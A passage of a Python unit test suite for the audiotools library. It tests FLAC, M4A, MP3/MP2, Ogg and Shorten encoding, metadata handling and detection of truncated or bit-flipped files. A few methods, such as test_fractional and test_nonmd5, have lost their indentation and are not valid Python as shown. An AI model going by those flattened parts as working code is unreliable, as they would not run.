                                #iterations rather than resetting - verify
                                for d in disable:
                                    encode_opts[d] = True
                                for e in extra:
                                    encode_opts[e] = True
                                if (blocksize is not None):
                                    encode_opts["block_size"] = blocksize
                                self.__test_reader__(
                                    MD5_Reader(EXACT_RANDOM_PCM_Reader(
                                        pcm_frames=65536,
                                        sample_rate=44100,
                                        channels=channels,
                                        channel_mask=mask,
                                        bits_per_sample=bps)),
                                    **encode_opts)
                                self.__test_reader__(
                                    MD5_Reader(EXACT_SILENCE_PCM_Reader(
                                        pcm_frames=65536,
                                        sample_rate=44100,
                                        channels=channels,
                                        channel_mask=mask,
                                        bits_per_sample=bps)),
                                    **encode_opts)
@FORMAT_FLAC
def test_fractional(self):
def __perform_test__(block_size, pcm_frames):
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16)),
block_size=block_size,
max_lpc_order=8,
min_residual_partition_order=0,
max_residual_partition_order=6)
for pcm_frames in [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]:
__perform_test__(33, pcm_frames)
for pcm_frames in [254, 255, 256, 257, 258, 510, 511, 512, 513,
514, 1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(256, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(2048, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097,
4098, 4606, 4607, 4608, 4609, 4610, 8190,
8191, 8192, 8193, 8194, 16382, 16383, 16384,
16385, 16386]:
__perform_test__(4608, pcm_frames)
#PCMReaders don't yet support seeking,
#so the seek tests can be skipped
#cuesheets are supported at the metadata level,
#which is tested above
#WAVE and AIFF length fixups are handled by the
#WaveAudio and AIFFAudio classes
#multiple file handling is performed at the tool level
#as is metadata handling
    @FORMAT_FLAC
    def test_clean(self):
        """exercise clean() repairs on each kind of fixable FLAC defect"""
        #metadata is tested separately
        from audiotools.text import (CLEAN_FLAC_REMOVE_ID3V2,
                                     CLEAN_FLAC_REMOVE_ID3V1,
                                     CLEAN_FLAC_REORDERED_STREAMINFO,
                                     CLEAN_FLAC_POPULATE_MD5,
                                     CLEAN_FLAC_ADD_CHANNELMASK,
                                     CLEAN_FLAC_FIX_SEEKTABLE)
        #check FLAC files with ID3 tags
        f = open("flac-id3.flac", "rb")
        self.assertEqual(f.read(3), "ID3")
        f.close()
        track = audiotools.open("flac-id3.flac")
        metadata1 = track.get_metadata()
        fixes = []
        #a dry run (no output path) reports fixes but returns None
        self.assertEqual(track.clean(fixes), None)
        self.assertEqual(fixes,
                         [CLEAN_FLAC_REMOVE_ID3V2,
                          CLEAN_FLAC_REMOVE_ID3V1])
        temp = tempfile.NamedTemporaryFile(suffix=".flac")
        try:
            fixes = []
            self.assertNotEqual(track.clean(fixes, temp.name), None)
            self.assertEqual(fixes,
                             [CLEAN_FLAC_REMOVE_ID3V2,
                              CLEAN_FLAC_REMOVE_ID3V1])
            #cleaned file starts with the bare FLAC signature
            f = open(temp.name, "rb")
            self.assertEqual(f.read(4), "fLaC")
            f.close()
            track2 = audiotools.open(temp.name)
            self.assertEqual(metadata1, track2.get_metadata())
            #audio data must be untouched by cleaning
            self.assertEqual(audiotools.pcm_frame_cmp(
                track.to_pcm(), track2.to_pcm()), None)
        finally:
            temp.close()
        #check FLAC files with STREAMINFO in the wrong location
        f = open("flac-disordered.flac", "rb")
        self.assertEqual(f.read(5), "fLaC\x04")
        f.close()
        track = audiotools.open("flac-disordered.flac")
        metadata1 = track.get_metadata()
        fixes = []
        self.assertEqual(track.clean(fixes), None)
        self.assertEqual(fixes,
                         [CLEAN_FLAC_REORDERED_STREAMINFO])
        temp = tempfile.NamedTemporaryFile(suffix=".flac")
        try:
            fixes = []
            self.assertNotEqual(track.clean(fixes, temp.name), None)
            self.assertEqual(fixes,
                             [CLEAN_FLAC_REORDERED_STREAMINFO])
            #block type 0 (STREAMINFO) now comes first
            f = open(temp.name, "rb")
            self.assertEqual(f.read(5), "fLaC\x00")
            f.close()
            track2 = audiotools.open(temp.name)
            self.assertEqual(metadata1, track2.get_metadata())
            self.assertEqual(audiotools.pcm_frame_cmp(
                track.to_pcm(), track2.to_pcm()), None)
        finally:
            temp.close()
        #check FLAC files with empty MD5 sum
        track = audiotools.open("flac-nonmd5.flac")
        fixes = []
        self.assertEqual(track.get_metadata().get_block(
            audiotools.flac.Flac_STREAMINFO.BLOCK_ID).md5sum, chr(0) * 16)
        self.assertEqual(track.clean(fixes), None)
        self.assertEqual(fixes, [CLEAN_FLAC_POPULATE_MD5])
        temp = tempfile.NamedTemporaryFile(suffix=".flac")
        try:
            fixes = []
            self.assertNotEqual(track.clean(fixes, temp.name), None)
            self.assertEqual(fixes, [CLEAN_FLAC_POPULATE_MD5])
            track2 = audiotools.open(temp.name)
            #cleaning populates the correct MD5 sum of the PCM data
            self.assertEqual(track2.get_metadata().get_block(
                audiotools.flac.Flac_STREAMINFO.BLOCK_ID).md5sum,
                '\xd2\xb1 \x19\x90\x19\xb69' +
                '\xd5\xa7\xe2\xb3F>\x9c\x97')
            self.assertEqual(audiotools.pcm_frame_cmp(
                track.to_pcm(), track2.to_pcm()), None)
        finally:
            temp.close()
        #check 24bps/6ch FLAC files without WAVEFORMATEXTENSIBLE_CHANNEL_MASK
        for (path, mask) in [("flac-nomask1.flac", 0x3F),
                             ("flac-nomask2.flac", 0x3F),
                             ("flac-nomask3.flac", 0x3),
                             ("flac-nomask4.flac", 0x3)]:
            no_blocks_file = tempfile.NamedTemporaryFile(suffix=".flac")
            try:
                no_blocks_file.write(open(path, "rb").read())
                no_blocks_file.flush()
                track = audiotools.open(no_blocks_file.name)
                metadata = track.get_metadata()
                #strip all non-STREAMINFO metadata blocks
                for block_id in range(1, 7):
                    metadata.replace_blocks(block_id, [])
                track.update_metadata(metadata)
                for track in [audiotools.open(path),
                              audiotools.open(no_blocks_file.name)]:
                    fixes = []
                    self.assertEqual(track.clean(fixes), None)
                    self.assertEqual(fixes, [CLEAN_FLAC_ADD_CHANNELMASK])
                    temp = tempfile.NamedTemporaryFile(suffix=".flac")
                    try:
                        fixes = []
                        track.clean(fixes, temp.name)
                        self.assertEqual(
                            fixes,
                            [CLEAN_FLAC_ADD_CHANNELMASK])
                        new_track = audiotools.open(temp.name)
                        self.assertEqual(new_track.channel_mask(),
                                         track.channel_mask())
                        self.assertEqual(int(new_track.channel_mask()), mask)
                        #the mask is stored as a Vorbis comment field
                        metadata = new_track.get_metadata()
                        self.assertEqual(
                            metadata.get_block(
                                audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)[
                                u"WAVEFORMATEXTENSIBLE_CHANNEL_MASK"][0],
                            u"0x%.4X" % (mask))
                    finally:
                        temp.close()
            finally:
                no_blocks_file.close()
        #check bad seekpoint destinations
        track = audiotools.open("flac-seektable.flac")
        fixes = []
        self.assertEqual(track.clean(fixes), None)
        self.assertEqual(fixes, [CLEAN_FLAC_FIX_SEEKTABLE])
        temp = tempfile.NamedTemporaryFile(suffix=".flac")
        try:
            fixes = []
            track.clean(fixes, temp.name)
            self.assertEqual(
                fixes,
                [CLEAN_FLAC_FIX_SEEKTABLE])
            #a freshly cleaned file should need no further fixes
            new_track = audiotools.open(temp.name)
            fixes = []
            new_track.clean(fixes, None)
            self.assertEqual(fixes, [])
        finally:
            temp.close()
@FORMAT_FLAC
def test_nonmd5(self):
flac = audiotools.open("flac-nonmd5.flac")
self.assertEqual(flac.__md5__, chr(0) * 16)
md5sum = md5()
#ensure that a FLAC file with an empty MD5 sum
#decodes without errors
audiotools.transfer_framelist_data(flac.to_pcm(),
md5sum.update)
self.assertEqual(md5sum.hexdigest(),
'd2b120199019b639d5a7e2b3463e9c97')
#ensure that a FLAC file with an empty MD5 sum
#verifies without errors
self.assertEqual(flac.verify(), True)
    @FORMAT_FLAC
    def test_python_codec(self):
        """run a reduced test suite through the pure-Python
        FLAC encoder and decoder"""
        #Python decoder and encoder are far too slow
        #to run anything resembling a complete set of tests
        #so we'll cut them down to the very basics
        def test_python_reader(pcmreader, **encode_options):
            """encode with the Python encoder, then ensure the
            Python and C decoders produce identical PCM output"""
            from audiotools.py_encoders import encode_flac

            #encode file using Python-based encoder
            temp_file = tempfile.NamedTemporaryFile(suffix=".flac")
            encode_flac(temp_file.name,
                        audiotools.BufferedPCMReader(pcmreader),
                        **encode_options)

            #verify contents of file decoded by
            #Python-based decoder against contents decoded by
            #C-based decoder
            from audiotools.py_decoders import FlacDecoder as FlacDecoder1
            from audiotools.decoders import FlacDecoder as FlacDecoder2
            self.assertEqual(audiotools.pcm_frame_cmp(
                FlacDecoder1(temp_file.name, 0),
                FlacDecoder2(temp_file.name, 0)), None)
            temp_file.close()

        #test small files
        for g in [test_streams.Generate01,
                  test_streams.Generate02,
                  test_streams.Generate03,
                  test_streams.Generate04]:
            test_python_reader(g(44100),
                               block_size=1152,
                               max_lpc_order=16,
                               min_residual_partition_order=0,
                               max_residual_partition_order=3,
                               mid_side=True,
                               adaptive_mid_side=True,
                               exhaustive_model_search=True)

        #test full-scale deflection
        for (bps, fsd) in [(8, test_streams.fsd8),
                           (16, test_streams.fsd16),
                           (24, test_streams.fsd24)]:
            for pattern in [test_streams.PATTERN01,
                            test_streams.PATTERN02,
                            test_streams.PATTERN03,
                            test_streams.PATTERN04,
                            test_streams.PATTERN05,
                            test_streams.PATTERN06,
                            test_streams.PATTERN07]:
                test_python_reader(
                    fsd(pattern, 100),
                    block_size=1152,
                    max_lpc_order=16,
                    min_residual_partition_order=0,
                    max_residual_partition_order=3,
                    mid_side=True,
                    adaptive_mid_side=True,
                    exhaustive_model_search=True)

        #test sines (much shorter streams than the C codec tests)
        for g in [test_streams.Sine8_Mono(5000, 48000,
                                          441.0, 0.50, 441.0, 0.49),
                  test_streams.Sine8_Stereo(5000, 48000,
                                            441.0, 0.50, 441.0, 0.49, 1.0),
                  test_streams.Sine16_Mono(5000, 48000,
                                           441.0, 0.50, 441.0, 0.49),
                  test_streams.Sine16_Stereo(5000, 48000,
                                             441.0, 0.50, 441.0, 0.49, 1.0),
                  test_streams.Sine24_Mono(5000, 48000,
                                           441.0, 0.50, 441.0, 0.49),
                  test_streams.Sine24_Stereo(5000, 48000,
                                             441.0, 0.50, 441.0, 0.49, 1.0),
                  test_streams.Simple_Sine(5000, 44100, 0x7, 8,
                                           (25, 10000),
                                           (50, 20000),
                                           (120, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x33, 8,
                                           (25, 10000),
                                           (50, 20000),
                                           (75, 30000),
                                           (65, 40000)),
                  test_streams.Simple_Sine(5000, 44100, 0x37, 8,
                                           (25, 10000),
                                           (35, 15000),
                                           (45, 20000),
                                           (50, 25000),
                                           (55, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
                                           (25, 10000),
                                           (45, 15000),
                                           (65, 20000),
                                           (85, 25000),
                                           (105, 30000),
                                           (120, 35000)),
                  test_streams.Simple_Sine(5000, 44100, 0x7, 16,
                                           (6400, 10000),
                                           (12800, 20000),
                                           (30720, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x33, 16,
                                           (6400, 10000),
                                           (12800, 20000),
                                           (19200, 30000),
                                           (16640, 40000)),
                  test_streams.Simple_Sine(5000, 44100, 0x37, 16,
                                           (6400, 10000),
                                           (8960, 15000),
                                           (11520, 20000),
                                           (12800, 25000),
                                           (14080, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
                                           (6400, 10000),
                                           (11520, 15000),
                                           (16640, 20000),
                                           (21760, 25000),
                                           (26880, 30000),
                                           (30720, 35000)),
                  test_streams.Simple_Sine(5000, 44100, 0x7, 24,
                                           (1638400, 10000),
                                           (3276800, 20000),
                                           (7864320, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x33, 24,
                                           (1638400, 10000),
                                           (3276800, 20000),
                                           (4915200, 30000),
                                           (4259840, 40000)),
                  test_streams.Simple_Sine(5000, 44100, 0x37, 24,
                                           (1638400, 10000),
                                           (2293760, 15000),
                                           (2949120, 20000),
                                           (3276800, 25000),
                                           (3604480, 30000)),
                  test_streams.Simple_Sine(5000, 44100, 0x3F, 24,
                                           (1638400, 10000),
                                           (2949120, 15000),
                                           (4259840, 20000),
                                           (5570560, 25000),
                                           (6881280, 30000),
                                           (7864320, 35000))]:
            test_python_reader(g,
                               block_size=1152,
                               max_lpc_order=16,
                               min_residual_partition_order=0,
                               max_residual_partition_order=3,
                               mid_side=True,
                               adaptive_mid_side=True,
                               exhaustive_model_search=True)

        #test wasted BPS
        test_python_reader(test_streams.WastedBPS16(1000),
                           block_size=1152,
                           max_lpc_order=16,
                           min_residual_partition_order=0,
                           max_residual_partition_order=3,
                           mid_side=True,
                           adaptive_mid_side=True,
                           exhaustive_model_search=True)

        #test block sizes
        noise = struct.unpack(">32h", os.urandom(64))

        encoding_args = {"min_residual_partition_order": 0,
                         "max_residual_partition_order": 6,
                         "mid_side": True,
                         "adaptive_mid_side": True,
                         "exhaustive_model_search": True}
        for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
                           24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
            for lpc_order in [0, 1, 2, 3, 4, 5, 7, 8, 9, 15, 16, 17, 31, 32]:
                args = encoding_args.copy()
                args["block_size"] = block_size
                args["max_lpc_order"] = lpc_order
                test_python_reader(
                    test_streams.FrameListReader(noise, 44100, 1, 16),
                    **args)
class M4AFileTest(LossyFileTest):
    """unit tests for M4A (AAC in an MP4 container) files"""

    def setUp(self):
        self.audio_class = audiotools.M4AAudio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_M4A
    def test_length(self):
        """check that encoded track lengths match the source lengths"""
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
                track = self.audio_class.from_pcm(temp.name,
                                                  BLANK_PCM_Reader(seconds))
                self.assertEqual(int(round(track.seconds_length())), seconds)
        finally:
            temp.close()

    @FORMAT_LOSSY
    def test_channels(self):
        """check channel count handling across backends"""
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for channels in [1, 2, 3, 4, 5, 6]:
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, channels=channels, channel_mask=0))
            if (self.audio_class is audiotools.m4a.M4AAudio_faac):
                #the faac backend always produces 2 channels
                self.assertEqual(track.channels(), 2)
                track = audiotools.open(temp.name)
                self.assertEqual(track.channels(), 2)
            else:
                self.assertEqual(track.channels(), max(2, channels))
                track = audiotools.open(temp.name)
                self.assertEqual(track.channels(), max(2, channels))
        finally:
            temp.close()

    @FORMAT_M4A
    def test_too(self):
        #ensure that the 'too' meta atom isn't modified by setting metadata
        temp = tempfile.NamedTemporaryFile(
            suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(
                temp.name,
                BLANK_PCM_Reader(1))
            metadata = track.get_metadata()
            #capture the encoder string before modifying metadata
            encoder = unicode(metadata['ilst']['\xa9too'])
            track.set_metadata(audiotools.MetaData(track_name=u"Foo"))
            metadata = track.get_metadata()
            self.assertEqual(metadata.track_name, u"Foo")
            #the encoder string must survive the metadata update
            self.assertEqual(unicode(metadata['ilst']['\xa9too']), encoder)
        finally:
            temp.close()
class MP3FileTest(LossyFileTest):
    """unit tests for MP3 files"""

    def setUp(self):
        self.audio_class = audiotools.MP3Audio
        self.suffix = "." + self.audio_class.SUFFIX

    @FORMAT_MP3
    def test_length(self):
        """check that encoded track lengths match the source lengths"""
        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
                track = self.audio_class.from_pcm(temp.name,
                                                  BLANK_PCM_Reader(seconds))
                self.assertEqual(int(round(track.seconds_length())), seconds)
        finally:
            temp.close()

    @FORMAT_MP3
    def test_verify(self):
        """placeholder - disabled until MP3/MP2 decoding is internalized"""
        #test invalid file sent to to_pcm()

        #FIXME - mpg123 doesn't generate errors on invalid files
        #Ultimately, all of MP3/MP2 decoding needs to be internalized
        #so that these sorts of errors can be caught consistently.

        # temp = tempfile.NamedTemporaryFile(
        #     suffix=self.suffix)
        # try:
        #     track = self.audio_class.from_pcm(
        #         temp.name,
        #         BLANK_PCM_Reader(1))
        #     good_data = open(temp.name, 'rb').read()
        #     f = open(temp.name, 'wb')
        #     f.write(good_data[0:100])
        #     f.close()
        #     reader = track.to_pcm()
        #     audiotools.transfer_framelist_data(reader, lambda x: x)
        #     self.assertRaises(audiotools.DecodingError,
        #                       reader.close)
        # finally:
        #     temp.close()

        #test invalid file send to convert()
        # temp = tempfile.NamedTemporaryFile(
        #     suffix=self.suffix)
        # try:
        #     track = self.audio_class.from_pcm(
        #         temp.name,
        #         BLANK_PCM_Reader(1))
        #     good_data = open(temp.name, 'rb').read()
        #     f = open(temp.name, 'wb')
        #     f.write(good_data[0:100])
        #     f.close()
        #     if (os.path.isfile("dummy.wav")):
        #         os.unlink("dummy.wav")
        #     self.assertEqual(os.path.isfile("dummy.wav"), False)
        #     self.assertRaises(audiotools.EncodingError,
        #                       track.convert,
        #                       "dummy.wav",
        #                       audiotools.WaveAudio)
        #     self.assertEqual(os.path.isfile("dummy.wav"), False)
        # finally:
        #     temp.close()

        # #test verify() on invalid files
        # temp = tempfile.NamedTemporaryFile(
        #     suffix=self.suffix)
        # mpeg_data = cStringIO.StringIO()
        # frame_header = audiotools.MPEG_Frame_Header("header")
        # try:
        #     mpx_file = audiotools.open("sine" + self.suffix)
        #     self.assertEqual(mpx_file.verify(), True)

        #     for (header, data) in mpx_file.mpeg_frames():
        #         mpeg_data.write(frame_header.build(header))
        #         mpeg_data.write(data)
        #     mpeg_data = mpeg_data.getvalue()

        #     temp.seek(0, 0)
        #     temp.write(mpeg_data)
        #     temp.flush()

        #     #first, try truncating the file underfoot
        #     bad_mpx_file = audiotools.open(temp.name)
        #     for i in xrange(len(mpeg_data)):
        #         try:
        #             if ((mpeg_data[i] == chr(0xFF)) and
        #                 (ord(mpeg_data[i + 1]) & 0xE0)):
        #                 #skip sizes that may be the end of a frame
        #                 continue
        #         except IndexError:
        #             continue

        #         f = open(temp.name, "wb")
        #         f.write(mpeg_data[0:i])
        #         f.close()
        #         self.assertEqual(os.path.getsize(temp.name), i)
        #         self.assertRaises(audiotools.InvalidFile,
        #                           bad_mpx_file.verify)

        #     #then try swapping some of the header bits
        #     for (field, value) in [("sample_rate", 48000),
        #                            ("channel", 3)]:
        #         temp.seek(0, 0)
        #         for (i, (header, data)) in enumerate(mpx_file.mpeg_frames()):
        #             if (i == 1):
        #                 setattr(header, field, value)
        #                 temp.write(frame_header.build(header))
        #                 temp.write(data)
        #             else:
        #                 temp.write(frame_header.build(header))
        #                 temp.write(data)
        #         temp.flush()
        #         new_file = audiotools.open(temp.name)
        #         self.assertRaises(audiotools.InvalidFile,
        #                           new_file.verify)
        # finally:
        #     temp.close()
        pass

    @FORMAT_MP3
    def test_id3_ladder(self):
        """ensure a chosen ID3 variant survives get/set_metadata cycles"""
        temp_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(temp_file.name,
                                              BLANK_PCM_Reader(5))

            dummy_metadata = audiotools.MetaData(track_name=u"Foo")

            #ensure that setting particular ID3 variant
            #sticks, even through get/set_metadata
            track.set_metadata(dummy_metadata)
            for new_class in (audiotools.ID3v22Comment,
                              audiotools.ID3v23Comment,
                              audiotools.ID3v24Comment,
                              audiotools.ID3v23Comment,
                              audiotools.ID3v22Comment):
                metadata = new_class.converted(track.get_metadata())
                track.set_metadata(metadata)
                metadata = track.get_metadata()
                self.assertEqual(isinstance(metadata, new_class), True)
                self.assertEqual(metadata.__class__, new_class([]).__class__)
                self.assertEqual(metadata, dummy_metadata)
        finally:
            temp_file.close()

    @FORMAT_MP3
    def test_ucs2(self):
        """check handling of characters outside the UCS-2 range
        in ID3v2.2/v2.3 (UCS-2 only) vs ID3v2.4 (UTF-8/UTF-16)"""
        temp_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(temp_file.name,
                                              BLANK_PCM_Reader(5))

            #this should be 4 characters long in UCS-4 environments
            #if not, we're in a UCS-2 environment
            #which is limited to 16 bits anyway
            test_string = u'f\U0001d55foo'

            #u'\ufffd' is the "not found" character
            #this string should result from escaping through UCS-2
            test_string_out = u'f\ufffdoo'

            if (len(test_string) == 4):
                self.assertEqual(test_string,
                                 test_string.encode('utf-16').decode('utf-16'))
                self.assertEqual(test_string.encode('ucs2').decode('ucs2'),
                                 test_string_out)

                #ID3v2.4 supports UTF-8/UTF-16
                metadata = audiotools.ID3v24Comment.converted(
                    audiotools.MetaData(track_name=u"Foo"))
                track.set_metadata(metadata)
                id3 = track.get_metadata()
                self.assertEqual(id3, metadata)

                metadata.track_name = test_string

                track.set_metadata(metadata)
                id3 = track.get_metadata()
                self.assertEqual(id3, metadata)

                metadata.comment = test_string
                track.set_metadata(metadata)
                id3 = track.get_metadata()
                self.assertEqual(id3, metadata)

                metadata.add_image(
                    audiotools.ID3v24Comment.IMAGE_FRAME.converted(
                        audiotools.ID3v24Comment.IMAGE_FRAME_ID,
                        audiotools.Image.new(TEST_COVER1,
                                             test_string,
                                             0)))
                track.set_metadata(metadata)
                id3 = track.get_metadata()
                self.assertEqual(id3.images()[0].description, test_string)

                #ID3v2.3 and ID3v2.2 only support UCS-2
                for id3_class in (audiotools.ID3v23Comment,
                                  audiotools.ID3v22Comment):
                    metadata = audiotools.ID3v23Comment.converted(
                        audiotools.MetaData(track_name=u"Foo"))
                    track.set_metadata(metadata)
                    id3 = track.get_metadata()
                    self.assertEqual(id3, metadata)

                    #ensure that text fields round-trip correctly
                    #(i.e. the extra-wide char gets replaced)
                    metadata.track_name = test_string
                    track.set_metadata(metadata)
                    id3 = track.get_metadata()
                    self.assertEqual(id3.track_name, test_string_out)

                    #ensure that comment blocks round-trip correctly
                    metadata.comment = test_string
                    track.set_metadata(metadata)
                    id3 = track.get_metadata()
                    self.assertEqual(id3.track_name, test_string_out)

                    #ensure that image comment fields round-trip correctly
                    metadata.add_image(id3_class.IMAGE_FRAME.converted(
                        id3_class.IMAGE_FRAME_ID,
                        audiotools.Image.new(TEST_COVER1,
                                             test_string,
                                             0)))
                    track.set_metadata(metadata)
                    id3 = track.get_metadata()
                    self.assertEqual(id3.images()[0].description,
                                     test_string_out)
        finally:
            temp_file.close()
class MP2FileTest(MP3FileTest):
    """runs the MP3 test suite against MP2 files"""

    def setUp(self):
        self.audio_class = audiotools.MP2Audio
        self.suffix = "." + self.audio_class.SUFFIX
class OggVerify:
    """mixin which exercises verify() and convert() error handling
    for Ogg-based formats (Vorbis, Opus, Ogg FLAC)"""

    @FORMAT_VORBIS
    @FORMAT_OPUS
    @FORMAT_OGGFLAC
    def test_verify(self):
        """ensure verify() rejects truncated and bit-flipped files
        and convert() fails cleanly on a truncated file"""
        good_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
        bad_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            good_track = self.audio_class.from_pcm(
                good_file.name,
                BLANK_PCM_Reader(1))
            good_file.seek(0, 0)
            good_file_data = good_file.read()
            self.assertEqual(len(good_file_data),
                             os.path.getsize(good_file.name))
            bad_file.write(good_file_data)
            bad_file.flush()

            track = audiotools.open(bad_file.name)
            self.assertEqual(track.verify(), True)

            #first, try truncating the file
            for i in xrange(len(good_file_data)):
                f = open(bad_file.name, "wb")
                f.write(good_file_data[0:i])
                #close (rather than merely flush) so a file
                #descriptor isn't leaked on every iteration
                f.close()
                self.assertEqual(os.path.getsize(bad_file.name), i)
                self.assertRaises(audiotools.InvalidFile,
                                  track.verify)

            #then, try flipping a bit
            for i in xrange(len(good_file_data)):
                for j in xrange(8):
                    bad_file_data = list(good_file_data)
                    bad_file_data[i] = chr(ord(bad_file_data[i]) ^ (1 << j))
                    f = open(bad_file.name, "wb")
                    f.write("".join(bad_file_data))
                    f.close()
                    self.assertEqual(os.path.getsize(bad_file.name),
                                     len(good_file_data))
                    self.assertRaises(audiotools.InvalidFile,
                                      track.verify)
        finally:
            good_file.close()
            bad_file.close()

        if (self.audio_class is audiotools.OpusAudio):
            #opusdec doesn't currently reject invalid
            #streams like it should
            #so the encoding test doesn't work right
            #(this is a known bug)
            return

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            track = self.audio_class.from_pcm(
                temp.name,
                BLANK_PCM_Reader(1))
            self.assertEqual(track.verify(), True)
            good_data = open(temp.name, 'rb').read()
            f = open(temp.name, 'wb')
            f.write(good_data[0:min(100, len(good_data) - 1)])
            f.close()
            if (os.path.isfile("dummy.wav")):
                os.unlink("dummy.wav")
            self.assertEqual(os.path.isfile("dummy.wav"), False)
            #converting the truncated file must fail
            #without leaving partial output behind
            self.assertRaises(audiotools.EncodingError,
                              track.convert,
                              "dummy.wav",
                              audiotools.WaveAudio)
            self.assertEqual(os.path.isfile("dummy.wav"), False)
        finally:
            temp.close()
class OggFlacFileTest(OggVerify,
                      LosslessFileTest):
    """tests for the Ogg FLAC format"""

    def setUp(self):
        from audiotools.decoders import OggFlacDecoder

        self.audio_class = audiotools.OggFlacAudio
        self.suffix = "." + self.audio_class.SUFFIX
        self.decoder = OggFlacDecoder

    @FORMAT_OGGFLAC
    def test_init(self):
        """broken inputs and decoder misuse should raise cleanly"""

        #a nonexistent path must raise InvalidFLAC
        self.assertRaises(audiotools.flac.InvalidFLAC,
                          audiotools.OggFlacAudio,
                          "/dev/null/foo")
        #progressively longer garbage must keep raising InvalidFLAC
        garbage = tempfile.NamedTemporaryFile(suffix=".oga")
        try:
            for byte in "invalidstringxxx":
                garbage.write(byte)
                garbage.flush()
                self.assertRaises(audiotools.flac.InvalidFLAC,
                                  audiotools.OggFlacAudio,
                                  garbage.name)
        finally:
            garbage.close()
        #a failed decoder init should raise rather than crash Python
        self.assertRaises(TypeError, self.decoder)
        self.assertRaises(TypeError, self.decoder, None)
        self.assertRaises(ValueError, self.decoder, "/dev/null", -1)
class ShortenFileTest(TestForeignWaveChunks,
                      TestForeignAiffChunks,
                      LosslessFileTest):
    """tests for the Shorten format"""

    def setUp(self):
        self.audio_class = audiotools.ShortenAudio
        self.suffix = "." + self.audio_class.SUFFIX
        from audiotools.decoders import SHNDecoder
        from audiotools.encoders import encode_shn
        self.decoder = SHNDecoder
        self.encode = encode_shn
        #a small, medium and large block size to exercise the encoder
        self.encode_opts = [{"block_size": 4},
                            {"block_size": 256},
                            {"block_size": 1024}]

    @FORMAT_SHORTEN
    def test_init(self):
        """invalid inputs should raise InvalidShorten at init-time"""

        #check missing file
        self.assertRaises(audiotools.shn.InvalidShorten,
                          audiotools.ShortenAudio,
                          "/dev/null/foo")
        #check invalid file
        invalid_file = tempfile.NamedTemporaryFile(suffix=".shn")
        try:
            for c in "invalidstringxxx":
                invalid_file.write(c)
                invalid_file.flush()
                self.assertRaises(audiotools.shn.InvalidShorten,
                                  audiotools.ShortenAudio,
                                  invalid_file.name)
        finally:
            invalid_file.close()
        #check some decoder errors,
        #mostly to ensure a failed init doesn't make Python explode
        self.assertRaises(TypeError, self.decoder)
        self.assertRaises(TypeError, self.decoder, None)
        self.assertRaises(IOError, self.decoder, "/dev/null/foo")

    @FORMAT_SHORTEN
    def test_bits_per_sample(self):
        """both 8 and 16 bits-per-sample should round-trip"""

        temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
        try:
            for bps in (8, 16):
                track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
                    1, bits_per_sample=bps))
                self.assertEqual(track.bits_per_sample(), bps)
                track2 = audiotools.open(temp.name)
                self.assertEqual(track2.bits_per_sample(), bps)
        finally:
            temp.close()

    @FORMAT_SHORTEN
    def test_verify(self):
        """damaged Shorten files should fail verify()/decode cleanly"""

        #test changing the file underfoot
        temp = tempfile.NamedTemporaryFile(suffix=".shn")
        try:
            shn_data = open("shorten-frames.shn", "rb").read()
            temp.write(shn_data)
            temp.flush()
            shn_file = audiotools.open(temp.name)
            self.assertEqual(shn_file.verify(), True)
            #NOTE(review): trailing NUL bytes appear to be treated as
            #ignorable padding, hence the rstrip(chr(0)) - confirm
            for i in xrange(0, len(shn_data.rstrip(chr(0)))):
                f = open(temp.name, "wb")
                f.write(shn_data[0:i])
                f.close()
                self.assertRaises(audiotools.InvalidFile,
                                  shn_file.verify)
            #unfortunately, Shorten doesn't have any checksumming
            #or other ways to reliably detect swapped bits
        finally:
            temp.close()
        #testing truncating various Shorten files
        #below "first" bytes the decoder fails at init-time,
        #from "first" up to "last" it inits but fails during decoding
        for (first, last, filename) in [(62, 89, "shorten-frames.shn"),
                                        (61, 116, "shorten-lpc.shn")]:
            f = open(filename, "rb")
            shn_data = f.read()
            f.close()
            temp = tempfile.NamedTemporaryFile(suffix=".shn")
            try:
                for i in xrange(0, first):
                    temp.seek(0, 0)
                    temp.write(shn_data[0:i])
                    temp.flush()
                    self.assertEqual(os.path.getsize(temp.name), i)
                    self.assertRaises(IOError,
                                      audiotools.decoders.SHNDecoder,
                                      temp.name)
                for i in xrange(first, len(shn_data[0:last].rstrip(chr(0)))):
                    temp.seek(0, 0)
                    temp.write(shn_data[0:i])
                    temp.flush()
                    self.assertEqual(os.path.getsize(temp.name), i)
                    decoder = audiotools.decoders.SHNDecoder(temp.name)
                    self.assertNotEqual(decoder, None)
                    self.assertRaises(IOError,
